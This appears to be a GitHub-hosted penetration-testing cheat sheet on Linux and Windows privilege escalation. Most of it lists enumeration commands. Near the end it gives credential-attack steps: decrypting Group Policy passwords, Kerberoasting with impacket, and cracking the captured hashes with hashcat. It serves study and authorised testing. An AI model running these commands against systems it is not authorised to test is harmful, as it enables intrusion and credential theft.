-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy path7-Privilege escalation
106 lines (66 loc) · 2.35 KB
/
7-Privilege escalation
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
LINUX
#Firstly, you can run the script below. It is important that you read the output of this script.
https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
#Kernel and OS
uname -a
cat /etc/issue
cat /etc/redhat-release //Redhat
cat /etc/lsb-release //Debian
#Misconfiguration sudo;
sudo -l
sudo -u scriptmanager bash //Change user with "sudo" command
#Detection of programs with SUID bits;
find / -perm +4000 -user root -type f -print 2>/dev/null
#Scheduled jobs;
crontab -l
cat /etc/crontab
#Detection of services run by root;
ps aux | grep root
#Detection of installed applications;
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
#For more of the manual enumeration steps;
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
-------------------------------------------------------------------------------------------------------------------------------
WINDOWS
#For the detection of missing patches;
https://github.com/AonCyberLabs/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py
#Operating System
systeminfo
wmic qfe
#Users
whoami
echo %USERNAME%
net users
net user <username>
whoami /priv
net localgroup
#Network
ipconfig /all
route print
arp -A
netstat -ano
#Programs
dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE
#Unquoted Service Patch
wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """
#Scheduled task;
schtasks /query /fo LIST 2>nul | findstr TaskName
dir C:\windows\tasks
#For more of the manual enumeration steps;
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
#For application examples;
https://www.youtube.com/watch?v=Fms9UuW05DA&list=PLi0kul0fEhZ9LNZN0-A3nX2xcx2R70JwN
#Groups.xml
get Groups.xml
cat Groups.xml (name, password)
gpp-Decrypt password #decryp_password
smbclient -W <domain_name> -U name //<domain_name>/share_name
#SPN
git https://github.com/SecureAuthCorp/impacket.git
python GetUsersSPN.py <domain_name>/user:decrypt_password -dc-ip <victim_ip> -request
hashcat -m 13100 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --force
-------------------------------------------------------------------------------------------------------------------------------